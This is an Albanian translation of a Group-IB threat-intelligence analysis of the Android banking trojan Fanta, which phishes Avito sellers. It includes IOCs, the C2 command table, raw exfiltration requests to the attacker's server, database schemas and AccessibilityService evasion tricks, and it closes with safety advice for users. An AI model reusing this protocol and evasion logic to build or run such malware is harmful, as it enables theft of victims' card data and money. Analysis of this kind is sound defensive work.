
Një herë do të donit të shisnit diçka në Avito dhe, duke publikuar një përshkrim të detajuar të produktit tuaj (për shembull, një modul memorie), do të merrni një mesazh të tillë:
Duke hapur lidhjen, do të shihni një faqe të dukshme mjaft të pafajshme, që njofton juve, një shitës të lumtur dhe të suksesshëm, për përfundimin e blerjes:

Pasi keni klikuar butonin âVazhdoâ, njĂ« skedari APK me ikonĂ«n dhe emrin qĂ« frymĂ«zojnĂ« besim do tĂ« shkarkohet nĂ« pajisjen tuaj Android. Keni instaluar aplikacionin, i cili pĂ«r njĂ« arsye tĂ« panjohur kĂ«rkoi tĂ« drejtat AccessibilityService, pastaj shfaqeshin dhe shuheshin shpejt disa dritare dhe⊠gjithçka.
Ju hyni pĂ«r tĂ« kontrolluar bilancin tuaj, por aplikacioni juaj bankar pĂ«r njĂ« arsye tĂ« panjohur pĂ«rsĂ«ri kĂ«rkon tĂ« dhĂ«nat e kartĂ«s tuaj. Pas futjes sĂ« tĂ« dhĂ«nave ndodh njĂ« e keqe: pĂ«r njĂ« arsye qĂ« akoma nuk e kuptoni, paratĂ« fillojnĂ« tĂ« zhduken nga llogaria juaj. Tentoni tĂ« zgjidhni problemin, por telefoni juaj bĂ«n rezistencĂ«: ai vetĂ« klikon butonat âMbrapaâ dhe âShtĂ«piâ, nuk ndizet dhe nuk lejon aktivizimin e asnjĂ« mase mbrojtĂ«se. PĂ«rfundimisht, ju e gjeni veten pa para, produkti juaj nuk Ă«shtĂ« shitur, jeni nĂ« ngatĂ«rrim dhe pyesni veten: çfarĂ« ndodhi?
Përgjigjja është e thjeshtë: ju u bëtë viktimë e trojanit Android Fanta, i familjes Flexnet. Si ndodhi që ndodhi kështu? Tani do ta shpjegojmë.
Autorët: Andrej Polovinkin, specialist i ri në analizën e kodeve të dëmshme, Ivan Pisarjov, specialist në analizën e kodeve të dëmshme.
Pak statistika
PĂ«r herĂ« tĂ« parĂ«, familja e trojanĂ«ve Android Flexnet u bĂ« e njohur nĂ« vitin 2015. GjatĂ« njĂ« periudhe tĂ« mjaftueshme aktiviteti, familja u zgjerua nĂ« disa nĂ«nfamilje: Fanta, Limebot, Lipton etj. TrojanĂ«t, si dhe infrastruktura e lidhur, nuk qĂ«ndrojnĂ« nĂ« vend: po zhvillohen skema tĂ« reja efektive shpĂ«rndarjeje â nĂ« rastin tonĂ« faqe phishing me cilĂ«si tĂ« lartĂ«, tĂ« orientuara ndaj pĂ«rdoruesve-shitĂ«s specifikĂ«, dhe zhvilluesit e trojanĂ«ve ndjekin trendet e modĂ«s nĂ« shkruarjen e viruseve â duke shtuar funksionalitete tĂ« reja qĂ« lejojnĂ« tĂ« vidhen mĂ« shpejt paratĂ« nga pajisjet e infektuara dhe tĂ« anashkalohen mekanizmat e mbrojtjes.
Kampanja e pĂ«rshkruar nĂ« kĂ«tĂ« artikull Ă«shtĂ« e orientuar ndaj pĂ«rdoruesve nga Rusia, njĂ« numĂ«r i vogĂ«l i pajisjeve tĂ« infektuara Ă«shtĂ« regjistruar nĂ« UkrainĂ«, edhe mĂ« pak â nĂ« Kazakistan dhe Bjellorrusi.
MegjithĂ«se Flexnet ka qenĂ« nĂ« arenĂ«n e trojaneve Android pĂ«r mĂ« shumĂ« se 4 vjet dhe Ă«shtĂ« studiuar nĂ« detaje nga shumĂ« kĂ«rkues, ai Ă«shtĂ« ende nĂ« formĂ« tĂ« mirĂ«. Duke filluar nga janari 2019, shuma potenciale e dĂ«mit Ă«shtĂ« mbi 35 milion rubla â dhe kjo Ă«shtĂ« vetĂ«m pĂ«r kampanjat nĂ« Rusi. NĂ« vitin 2015, versionet e ndryshme tĂ« kĂ«tij trojanii Android u shitĂ«n nĂ« forumin e nĂ«nkulturĂ«s, ku gjithashtu mund tĂ« gjendej kodi burimor i trojanit me njĂ« pĂ«rshkrim tĂ« detajuar. Kjo do tĂ« thotĂ« se statistikat e dĂ«mit nĂ« botĂ« janĂ« edhe mĂ« mbresĂ«lĂ«nĂ«se. NjĂ« shifĂ«r e mirĂ« pĂ«r njĂ« tĂ« moshuar si ai, apo jo?

Nga shitja në mashtrim
Siç shihet nĂ« ekranin e mĂ«parshĂ«m tĂ« faqes sĂ« phishing pĂ«r shĂ«rbimin e internetit pĂ«r shpallje Avito, ajo ishte pĂ«rgatitur pĂ«r njĂ« viktimĂ« specifike. Sipas dukjes, kriminelĂ«t po pĂ«rdorin njĂ« nga parserĂ«t e Avito, qĂ« nxjerr numrin e telefonit dhe emrin e shitĂ«sit, si dhe pĂ«rshkrimin e produktit. Pas hapjes sĂ« faqes dhe pĂ«rgatitjes sĂ« dosjes APK, viktimĂ«s i dĂ«rgohet njĂ« mesazh SMS me emrin e saj dhe lidhjen nĂ« faqen e phishing, e cila pĂ«rmban pĂ«rshkrimin e produktit tĂ« saj dhe shumĂ«n e marrĂ« nga "shitja" e produktit. Duke klikuar butonin, pĂ«rdoruesi merr njĂ« dosje APK tĂ« dĂ«mshme â Fanta.
Studimi i domeneve shcet491[.]ru tregoi se ai është deleguar në serverët DNS të kompanisë Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Skeda e zonës së domenit përmban rekorde që tregojnë Adresa IP 31.220.23[.]236, 31.220.23[.]243 dhe 31.220.23[.]235. Megjithatë, rekordi kryesor burimor i domenit (A-record) tregon për një server me adresën IP 178.132.1[.]240.
Adresa IP 178.132.1[.]240 ndodhet në Holandë dhe i përket hostit WorldStream. Adresat IP 31.220.23[.]235, 31.220.23[.]236 dhe 31.220.23[.]243 ndodhen në Mbretërinë e Bashkuar dhe i përkasin serverit të hostimit virtual HOSTINGER. Si regjistrues përdoret openprov-ru. Në adresën IP 178.132.1[.]240 gjithashtu u regjistruan domenet:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Duhet të theksohet se pothuajse të gjitha domenet kishin lidhje të disponueshme në formatin e mëposhtëm:
http://(www.){0,1}/[0-9]{7}
Ky model përfshin gjithashtu lidhjen nga mesazhi SMS. Sipas të dhënave historike, është zbuluar se një domeni i përkiste disa lidhjeve sipas modelit të mësipërm, që tregon për përdorimin e një domeni për përhapjen e trojanit te disa viktima.
Le tĂ« shkojmĂ« pak pĂ«rpara: si server menaxhues, trojani i shkarkuar nga lidhja nĂ« SMS pĂ«rdor adresĂ«n onuseseddohap[.]club. Ky domain u regjistrua mĂ« 12-03-2019, dhe nga 29-04-2019 kishte ndĂ«rveprime tĂ« aplikacioneve APK me kĂ«tĂ« domain. Duke u bazuar nĂ« tĂ« dhĂ«nat e marra nga VirusTotal, gjithsej 109 aplikacione ndĂ«rveprim tĂ« kĂ«tij serveri. Ky domain ishte i vendosur nĂ« IP-adresĂ«n 217.23.14[.]27, e cila gjendet nĂ« HolandĂ« dhe i pĂ«rket hostit WorldStream. Si regjistrues pĂ«rdoret namecheap. NĂ« kĂ«tĂ« IP-adresĂ« gjithashtu ishin regjistruar domainet bad-racoon[.]club (qĂ« nga 25-09-2018) dhe bad-racoon[.]live (qĂ« nga 25-10-2018). Me domainin bad-racoon[.]club kanĂ« ndĂ«rvepruar mĂ« shumĂ« se 80 APK-fajla, me bad-racoon[.]live â mĂ« shumĂ« se 100.
Në përgjithësi, plani i sulmit duket kështu:

ĂfarĂ« ka Fanta nĂ«n kapak?
Si shumë trojanët e tjerë të Android, Fanta është në gjendje të lexojë dhe dërgojë mesazhe SMS, të bëjë kërkesa USSD, të shfaqë dritare mbi aplikacione (përfshirë ato bankare). Megjithatë, në arsenalin e funksioneve të këtij grupi ka ardhur një risi: Fanta ka filluar të përdorë AccessibilityService për qëllime të ndryshme: leximi i përmbajtjes së njoftimeve të aplikacioneve të tjera, parandalimi i zbulesës dhe ndalimi i ekzekutimit të trojanit në pajisjen e infektuar, etj. Fanta punon në të gjitha versionet e Android që nuk janë më të vogla se 4.4. Në këtë artikull ne do të shqyrtojmë më në imtësi mostrat e ardhshme të Fanta:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Menjëherë pas nisjes
Menjëherë pas nisjes, trojani fsheh ikonën e tij. Funksionimi i aplikacionit është i mundur vetëm nëse emri i pajisjes së infektuar nuk ndodhet në listën:
- android_x86
- VirtualBox
- Nexus 5X(bullhead)
- Nexus 5(razor)
Kjo kontroll bĂ«het nĂ« shĂ«rbimin kryesor tĂ« trojanit â MainService. GjatĂ« fillimit tĂ« parĂ«, inicializohen parametrat e konfigurimit tĂ« aplikacionit me vlerat e paracaktuara (pĂ«r formatin e ruajtjes sĂ« tĂ« dhĂ«nave tĂ« konfigurimit dhe kuptimin e tyre do tĂ« flasim mĂ« vonĂ«), si dhe regjistrimi i pajisjes sĂ« infektuar nĂ« serverin menaxhues. Servisi do tĂ« dĂ«rgojĂ« njĂ« kĂ«rkesĂ« HTTP POST me tipin e mesazhit register_bot dhe informacionin rreth pajisjes sĂ« infektuar (versioni i Android, IMEI, numrin e telefonit, emrin e operatorit dhe kodin e vendit ku Ă«shtĂ« regjistruar operatori). Adresa shĂ«rben si server menaxhues hXXp://onuseseddohap[.]club/controller.php. NĂ« pĂ«rgjigje, serveri dĂ«rgon njĂ« mesazh qĂ« pĂ«rmban fushat bot_id, bot_pwd, server â kĂ«to vlera aplikacioni i ruan si parametra tĂ« serverit CnC. Parametri server Ă«shtĂ« opsional nĂ«se fusha nuk Ă«shtĂ« marrĂ«: Fanta pĂ«rdor adresĂ«n e regjistrimit â hXXp://onuseseddohap[.]club/controller.php. Funksioni i ndryshimit tĂ« adresĂ«s CnC mund tĂ« pĂ«rdoret pĂ«r tĂ« zgjidhur dy probleme: ndarjen e baraspeshuar tĂ« ngarkesĂ«s midis serverĂ«ve tĂ« shumtĂ« (nĂ« rastin e njĂ« numri tĂ« madh tĂ« pajisjeve tĂ« infektuara, ngarkesa nĂ« serverin e uebit tĂ« paoptimizuar mund tĂ« jetĂ« e lartĂ«), si dhe pĂ«r tĂ« pĂ«rdorur njĂ« server alternativ nĂ« rast dĂ«shtimi tĂ« njĂ«rit nga shĂ«rbimet CnC.
Nëse gjatë dërgimit të kërkesës ndodh një gabim, trojani do të përsërisë procesin e regjistrimit pas 20 sekondash.
Pas regjistrimit të suksesshëm të pajisjes, Fanta do të shfaqë këtë mesazh për përdoruesin:

ShĂ«nim i rĂ«ndĂ«sishĂ«m: shĂ«rbimi me emrin Siguria e sistemit â emri i shĂ«rbimit tĂ« trojanit, dhe pas klikimit nĂ« butonin OK do tĂ« hapet njĂ« dritare me cilĂ«simet e Accessibility tĂ« pajisjes sĂ« infektuar, pĂ«r nga ku pĂ«rdoruesi duhet tĂ« japĂ« vetĂ« tĂ« drejtat e Accessibility pĂ«r shĂ«rbimin e dĂ«mshĂ«m:

Sa herë që përdoruesi aktivizon AccessibilityService, Fanta fiton akses në përmbajtjen e dritareve të aplikacioneve dhe veprimeve që kryhen në to:

Menjëherë pas marrjes së të drejtave të Accessibility, trojani kërkon të drejtat e administratorit dhe të drejtat për leximin e njoftimeve:

Me ndihmën e AccessibilityService, aplikacioni imiton shtypjet e çelësave, duke i dhënë kështu vetes të gjitha të drejtat e nevojshme.
Fanta krijon disa ekzemplarë të bazës së të dhënave (të cilat do të përshkruhen më vonë), të nevojshme për ruajtjen e të dhënave konfiguruese, si dhe informacionit të mbledhur gjatë procesit për pajisjen e infektuar. Për të dërguar informacionin e mbledhur, trojani krijon një detyrë të përsëritur, e cila është e destinuar për ngarkimin e fushave nga baza e të dhënave dhe për të marrë komandën nga serveri drejtues. Intervali i qasjes në CnC vendoset në varësi të versionit të Android: në rastin e 5.1, intervali do të jetë 10 sekonda, përndryshe 60 sekonda.
Për të marrë komandën, Fanta bën një kërkesë GetTask në serverin drejtues. Në përgjigje, CnC mund të dërgojë një nga këto komanda:
| Ekipa | Përshkrimi |
|---|---|
| 0 | Dërgo një mesazh SMS |
| 1 | Kryej një telefonatë ose komandë USSD |
| 2 | Përditëso parametrin interval |
| 3 | Përditëso parametrin intercept |
| 6 | Përditëso parametrin smsManager |
| 9 | Filloni mbledhjen e mesazheve SMS |
| 11 | Rivendosni telefonin në parametrat e fabrikës |
| 12 | Aktivizimi/Deaktivizimi i regjistrimit të krijimit të dritareve të dialogut |
Fanta gjithashtu mbledh njoftime nga 70 aplikacione bankash, sisteme pagash të shpejta dhe portofolesh elektronikë dhe i ruan ato në databazën e saj.
Ruajtja e parametrave të konfigurimit
PĂ«r ruajtjen e parametrave tĂ« konfigurimit, Fanta pĂ«rdor qasjen standarde pĂ«r platformĂ«n Android â Preferences-file. CilĂ«simet do tĂ« ruhen nĂ« njĂ« skedar me emrin settings. PĂ«rshkrimi i parametrave tĂ« ruajtur ndodhet nĂ« tabelĂ«n mĂ« poshtĂ«.
| Emri | Vlera e paracaktuar | Vlerat e mundshme | Përshkrimi |
|---|---|---|---|
| id | 0 | Integer | Identifikuesi i botit |
| server | hXXp://onuseseddohap[.]club/ | URL | Adresa e serverit ndihmës |
| pwd | â | String | Fjala kalim pĂ«r serverin |
| interval | 20 | Integer | Intervali kohor. Tregon sa duhet të vonohet kryerja e detyrave të mëposhtme:
|
| intercept | të gjitha | all/telNumber | Nëse fusha është e barabartë me stringun të gjitha ose telNumber, atëherë SMS-i i marrë do të kapet nga aplikacioni dhe nuk do t'i shfaqet përdoruesit. |
| smsManager | 0 | 0/1 | Aktivizimi/Deaktivizimi i aplikacionit si marrës i SMS-ve si parazgjedhje |
| readDialog | false | True/false | Aktivizimi/Deaktivizimi i regjistrimit të ngjarjeve AccessibilityEvent |
Po ashtu, Fanta përdor skedarin smsManager:
| Emri | Vlera e paracaktuar | Vlerat e mundshme | Përshkrimi |
|---|---|---|---|
| pckg | â | String | Emri i menaxherit tĂ« SMS-ve tĂ« pĂ«rdorur |
Ndërveprimi me databazat
Gjatë funksionimit të saj, trojan-i përdor dy databaza. Databaza me emrin a përdoret për ruajtjen e informacionit të ndryshëm të mbledhur nga telefoni. Databaza e dytë quhet fanta.db dhe përdoret për të ruajtur parametrat që janë përgjegjës për krijimin e dritareve phishing, të destinuara për mbledhjen e informacionit mbi kartat bankare.
Trojan-i përdor databazën a për ruajtjen e informacionit të mbledhur dhe regjistrimin e veprimeve të veta. Të dhënat ruhen në tabelën logs. Për krijimin e tabelës përdoret kërkesa SQL vijues:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Në databazë ndodhen të dhënat vijuese:
1. Regjistrimi i ndezjes së pajisjes së infektuar me mesazhin Telefoni u ndez!
2. Njoftimet nga aplikacionet. Mesazhi formohet sipas shabllonit vijues:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Të dhënat e kartave bankare nga format phishing të krijuara nga trojan-i. Parametri VIEW_NAME mund të jetë një nga listën:
- AliExpress
- Avito
- Google Play
- TĂ« ndryshme <%App Name%>
Mesazhi regjistrohet në formatin:
[]() Numri i kartës:; Data:/%; CVV:
4. Mesazhet SMS që hyjnë/dalin në format:
([<%Koha në formatin HH:mm:ss dd.MM.yyyy%>] Lloji: I Hyjshëm/I Dalshëm) <%Numri celular%>:<%Teksti SMS%>
5. Informacion mbi paketën që krijon dritaren në format:
(<%Emri i Paketës%>)<%Informacioni mbi Paketën%>
Shembujt e tabelës logs:

Një nga funksionalitetet e Fanta është mbledhja e informacionit mbi kartat bankare. Mbledhja e të dhënave ndodh përmes krijimit të dritareve phishing gjatë hapjes së aplikacioneve bankare. Trojani krijon një dritare phishing vetëm një herë. Informacioni në lidhje me shfaqjen e dritares për përdoruesin ruhet në tabelë. settings në bazën e të dhënave fanta.db. Për krijimin e një baze të dhënash përdoret pyetja SQL si vijon:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Të gjitha fushat e tabelës settings për default inicializohen me vlerën 1 (krijoni një dritare phishing). Pasi përdoruesi të futë të dhënat e tij, vlera do të vendoset në 0. Shembujt e fushave të tabelës settings:
- can_login â fusha pĂ«rgjigjet pĂ«r shfaqjen e formularit gjatĂ« hapjes sĂ« aplikacionit bankar
- first_bank â nuk pĂ«rdoret
- can_avito â fusha pĂ«rgjigjet pĂ«r shfaqjen e formularit gjatĂ« hapjes sĂ« aplikacionit Avito
- can_ali â fusha pĂ«rgjigjet pĂ«r shfaqjen e formularit gjatĂ« hapjes sĂ« aplikacionit Aliexpress
- can_another â fusha pĂ«rgjigjet pĂ«r shfaqjen e formularit gjatĂ« hapjes sĂ« çdo aplikacioni nga lista: Yula, Pandao, Drom Auto, KoshĂ«lek. Kartat zbritĂ«se dhe bonus, Aviasales, Booking, Trivago
- can_card â fusha pĂ«rgjigjet pĂ«r shfaqjen e formularit gjatĂ« hapjes sĂ« Google Play
Interaksioni me serverin e menaxhimit
Ndërveprimi rrjetësor me serverin e menaxhimit ndodh përmes protokollit HTTP. Për punën me rrjetin, Fanta përdor bibliotekën e njohur Retrofit. Kërkesat dërgohen në adresën hXXp://onuseseddohap[.]club/controller.php. Adresa e serverit mund të ndryshohet gjatë regjistrimit në server. Në përgjigje nga serveri mund të arrijnë cookie. Fanta realizon kërkesat si vijon:
- Regjistrimi i botit në serverin e menaxhimit ndodh një herë në startimin e parë. Në server dërgohen të dhënat e mëposhtme për pajisjen e infektuar:
· Cookie â cookie tĂ« marra nga serveri (vlera e paracaktuar â string i zbrazĂ«t)
· mode â konstante string register_bot
· prefix â konstante tĂ« numrave 2
· version_sdk â formohet sipas kĂ«tij shembulli: <%Build.MODEL%> / <%Build.VERSION.RELEASE%>(Avit)
· imei â IMEI i pajisjes sĂ« infektuar
· country â kodi i vendit, ku Ă«shtĂ« regjistruar operatori, nĂ« formatin ISO
· number â numri i telefonit
· operator â emri i operatoritShembuj i kĂ«rkesĂ«s dĂ«rguar nĂ« server:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=&imei=&country=&number=&operator=Në përgjigje të kërkesës, serveri duhet të kthejë një objekt JSON që përmban parametrat e mëposhtëm:
· bot_id â identifikuesi i pajisjes sĂ« infektuar. NĂ«se bot_id Ă«shtĂ« 0, Fanta do tĂ« ekzekutojĂ« pĂ«rsĂ«ri kĂ«rkesĂ«n.
· bot_pwd â password pĂ«r serverin.
· server â adresa e serverit menaxhues. ParametĂ«r i opsional. NĂ«se parametri nuk Ă«shtĂ« i specifikuar, do tĂ« pĂ«rdoret adresa e ruajtur nĂ« aplikacion.Shembull i objektit JSON:
{ "response":[ { "bot_id": , "bot_pwd": , "server": } ], "status":"ok" }
- Kërkesa për marrjen e komandës nga serveri. Në server dërgohen të dhënat e mëposhtme:
· Cookie â cookie-t e pranuara nga serveri
· bid â id e pajisjes sĂ« infektuar, qĂ« Ă«shtĂ« marrĂ« kur Ă«shtĂ« dĂ«rguar kĂ«rkesa register_bot
· pwd â password pĂ«r serverin
· divice_admin â fusha pĂ«rcakton nĂ«se janĂ« marrĂ« tĂ« drejtat e administratorit. NĂ«se janĂ« marrĂ« tĂ« drejtat e administratorit, fusha Ă«shtĂ« 1, pĂ«rndryshe 0
· Accessibility â statusi i funksionimit tĂ« ShĂ«rbimit Accessibility. NĂ«se shĂ«rbimi Ă«shtĂ« aktivizuar, vlera Ă«shtĂ« 1, pĂ«rndryshe 0
· SMSManager â tregon nĂ«se trojani Ă«shtĂ« aktiv si aplikacioni i paracaktuar pĂ«r marrjen e SMS-ve
· screen â tregon se nĂ« çfarĂ« gjendjeje ndodhet ekrani. Vlera do tĂ« vendoset 1, nĂ«se ekrani Ă«shtĂ« aktiv, pĂ«rndryshe 0;Shembuj i kĂ«rkesĂ«s dĂ«rguar nĂ« server:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=&pwd=&divice_admin=&Accessibility=&SMSManager=&screen=Në varësi të komandës, serveri mund të kthejë një objekt JSON me parametra të ndryshëm:
· Ekipa Dërgo një mesazh SMS: Në parametrat përmban numrin e telefonit, tekstin e SMS-së dhe identifikuesin e mesazhit të dërguar. Identifikuesi përdoret kur dërgohet mesazhi në server me tipin setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": , "sms_text": , "sms_id": %SMS_ID% } ], "status":"ok" }· Ekipa Kryej një telefonatë ose komandë USSD: Numri i telefonit ose komanda arrin në trupin e përgjigjes.
{ "response": [ { "mode": 1, "command": } ], "status":"ok" }· Ekipa Ndrysho parametrin interval.
{ "response": [ { "mode": 2, "interval": } ], "status":"ok" }· Ekipa Ndrysho parametrin intercept.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/ } ], "status":"ok" }· Ekipa Ndrysho fushën SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Ekipa Kryej grumbullimin e SMS-ve nga pajisja e infektuar.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Ekipa Rivendosni telefonin në parametrat e fabrikës:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Ekipa Ndrysho parametrin ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Dërgimi i mesazhit me tipin setSmsStatus. Kërkesa bëhet pas ekzekutimit të komandës Dërgo një mesazh SMS. Kërkesa duket kështu:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Dërgimi i përmbajtjes së bazës së të dhënave. Në një kërkesë dërgohet një rresht. Në server dërgohen të dhënat e mëposhtme:
· Cookie â cookie-t e pranuara nga serveri
· mode â konstante string setSaveInboxSms
· bid â id e pajisjes sĂ« infektuar, qĂ« Ă«shtĂ« marrĂ« kur Ă«shtĂ« dĂ«rguar kĂ«rkesa register_bot
· text â teksti nĂ« regjistrin aktual tĂ« DB (fusha d nga tabela logs nĂ« bazĂ«n e tĂ« dhĂ«nave a)
· number â emri i regjistrit aktual tĂ« DB (fusha p nga tabela logs nĂ« bazĂ«n e tĂ« dhĂ«nave a)
· sms_mode â vlera e numrit tĂ« plotĂ« (fusha m nga tabela logs nĂ« bazĂ«n e tĂ« dhĂ«nave a)KĂ«rkesa duket kĂ«shtu:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Nëse dërgimi në server është i suksesshëm, rreshti do të fshihet nga tabela. Shembulli i objektit JSON që kthehet nga serveri:
{ "response":[], "status":"ok" }
Ndërveprimi me AccessibilityService
AccessibilityService Ă«shtĂ« realizuar pĂ«r tĂ« lehtĂ«suar pĂ«rdorimin e pajisjeve Android nga njerĂ«zit me kufizime. NĂ« shumicĂ«n e rasteve, pĂ«r tĂ« ndĂ«rvepruar me aplikacionin kĂ«rkohet ndĂ«rveprim fizik. AccessibilityService lejon qĂ« kjo tĂ« bĂ«het programatikisht. Fanta pĂ«rdor shĂ«rbimin pĂ«r tĂ« krijuar dritare tĂ« rreme nĂ« aplikacionet bankare dhe pĂ«r tĂ« penguar hapjen e ĐœĐ°ŃŃŃĐŸĐčkave tĂ« sistemit dhe disa aplikacioneve.
Duke pĂ«rdorur funksionalitetet e AccessibilityService, trojani monitoron ndryshimet e elementeve nĂ« ekranin e pajisjes sĂ« infektuar. Siç Ă«shtĂ« pĂ«rmendur mĂ« parĂ«, nĂ« cilĂ«simet e Fanta ka njĂ« parameter qĂ« pĂ«rgjigjet pĂ«r regjistrimin e operacioneve me dritaret dialogu â readDialog. NĂ«se ky parameter Ă«shtĂ« vendosur, do tĂ« shtohet informacion nĂ« bazĂ«n e tĂ« dhĂ«nave pĂ«r emrin dhe pĂ«rshkrimin e paketĂ«s qĂ« iniciuoi ngjarjen. Trojani kryen veprime tĂ« mĂ«poshtme kur ndodhin ngjarje:
- Imiton shtypjen e çelsave prapa dhe në shtëpi në rastin e:
· nëse përdoruesi dëshiron të rinisë pajisjen e tij
· nĂ«se pĂ«rdoruesi dĂ«shiron tĂ« fshijĂ« aplikacionin âAvitoâ ose tĂ« ndryshojĂ« tĂ« drejtat e aksesit
· nĂ«se ka pĂ«rmendje pĂ«r aplikacionin âAvitoâ nĂ« faqe
· kur hap aplikacionin âGoogle Play Mbrojtjaâ
· kur hap faqet me cilësimet e AccessibilityService
· kur shfaqet dritarja âSiguria e sistemitâ
· kur hap faqen me cilĂ«simet âVizato mbi aplikacione tĂ« tjeraâ
· kur hap faqen âAplikacionetâ, âRikthimi dhe rivendosjaâ, âRivendosja e tĂ« dhĂ«naveâ, âRivendosja e cilĂ«simeveâ, âPaneli i zhvilluesveâ, âAftĂ«si tĂ« veçantaâ, âAftĂ«sitĂ« specialeâ, âTĂ« drejta tĂ« veçantaâ
· nëse ngjarja është gjeneruar nga aplikacione të caktuara.Lista e aplikacioneve
- android
- Master Lite
- Clean Master
- Clean Master për CPU x86
- Menaxhimi i të drejtave të aplikacioneve Meizu
- Siguria MIUI
- Clean Master â Antivirus & Pastrimi i caches dhe mbeturinave
- Kontrolli Prindëror dhe GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Siguria në Internet Beta
- Virus Cleaner, Antivirus, Cleaner (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivirus & mbrojtje falas 2019
- Mobile Security MegaFon
- AVG Protection për Xperia
- Siguria Mobili
- Malwarebytes antivirus & mbrojtja
- Antivirus për Android 2019
- Security Master â Antivirus, VPN, AppLock, Booster
- AVG antivirus për tabletin Huawei Menaxheri i Sistemit
- Samsung Accessibility
- Samsung Smart Manager
- Security Master
- Speed Booster
- Dr.Web
- Dr.Web Security Space
- Dr.Web Qendra e Kontrollit të Mobile
- Dr.Web Security Space Life
- Dr.Web Qendra e Kontrollit të Mobile
- Antivirus & Siguria Mobili
- Kaspersky Internet Security: Antivirus dhe Mbrojtje
- Kaspersky Battery Life: Kursyes & Booster
- Kaspersky Endpoint Security â mbrojtje dhe menaxhim
- AVG Antivirus falas 2019 â Mbrojtje pĂ«r Android
- Antivirus Android
- Norton Mobile Security dhe Antivirus
- Antivirus, firewall, VPN, siguria mobile
- Mobile Security: antivirus, VPN, mbrojtje nga vjedhja
- Antivirus për Android
- Nëse gjatë dërgimit të një mesazhi SMS në një numër të shkurtër kërkohet leja, Fanta imiton shtypjen në checkbox Kujto zgjedhjen dhe butonin dërgo.
- Kur përpiqet të shkëputë nga trojani të drejtat e administratorit, bllokon ekranin e telefonit.
- Pengon shtimin e administratorëve të rinj.
- Nëse aplikacioni antivirus dr.web ka zbuluar një kërcënim, Fanta imiton shtypjen në butonin injoro.
- Trojani imiton shtypjen në butonin prapa dhe në shtëpi, nëse ngjarja është gjeneruar nga aplikacioni Samsung Device Care.
- Fanta krijon dritare phishing me forma për të hyrë informacionin e kartelave bankare, nëse është nisur aplikacioni nga lista që përfshin rreth 30 shërbime të ndryshme online. Mes tyre: AliExpress, Booking, Avito, Komponenti i Google Play Market, Pandao, Drom Auto dhe të tjerë.
Forma phishing
Fanta analizon se cilat aplikacione hapen në pajisjen e infektuar. Nëse është hapur një aplikacion i interesit, trojani shfaq një dritare phishing mbi të gjitha të tjerat, e cila përbën një formë hyrje për informacionin e kartelës bankare. Përdoruesi duhet të japë të dhënat e mëposhtme:
- Numri i kartelës
- Data e skadimit të kartelës
- CVV
- Emri i mbajtësit të kartelës (jo për të gjitha bankat)
Sipas aplikacionit të hapur, do të shfaqen dritare phishing të ndryshme. Më poshtë do të jepen disa shembuj të tyre:
Aliexpress:

Avito:
Për disa aplikacione të tjera, si p.sh. Google Play Market, Aviasales, Pandao, Booking, Trivago:

Si ishte e vërteta
FatmirĂ«sisht, personi qĂ« mori mesazhin SMS tĂ« pĂ«rshkruar nĂ« fillim tĂ« artikullit, ishte njĂ« specialist nĂ« fushĂ«n e sigurisĂ« kibernetike. Prandaj, versioni real, jo i filmit, ndryshon nga ai i treguar mĂ« parĂ«: personi mori njĂ« SMS tĂ« interesant, pas tĂ« cilit ia dorĂ«zoi ekipit tĂ« Group-IB Threat Hunting Intelligence. Rezultati i sulmit â ky artikull. NjĂ« fund i lumtur, apo jo? MegjithatĂ«, jo tĂ« gjitha tregimet pĂ«rfundojnĂ« aq mirĂ«, dhe qĂ« historia juaj tĂ« mos jetĂ« si versioni i filmit me humbje parash, nĂ« shumicĂ«n e rasteve mjafton tĂ« ndiqni kĂ«to rregulla tĂ« pĂ«rshkruara prej kohĂ«sh:
- mos instaloni aplikacione për pajisje mobile me sistemin operativ Android nga burime të ndryshme përveç Google Play
- kur instaloni aplikacionin, kushtojini vëmendje të veçantë të drejtave që aplikacioni kërkon
- kushtojini vëmendje shtesave të skedarëve që shkarkoni
- instaloni rregullisht azhurnimet e sistemit operativ Android
- mos vizitoni burime dyshuese dhe mos shkarkoni skedarë nga aty
- mos klikoni në lidhjet e marra në mesazhet SMS.
Burimi: habr.com



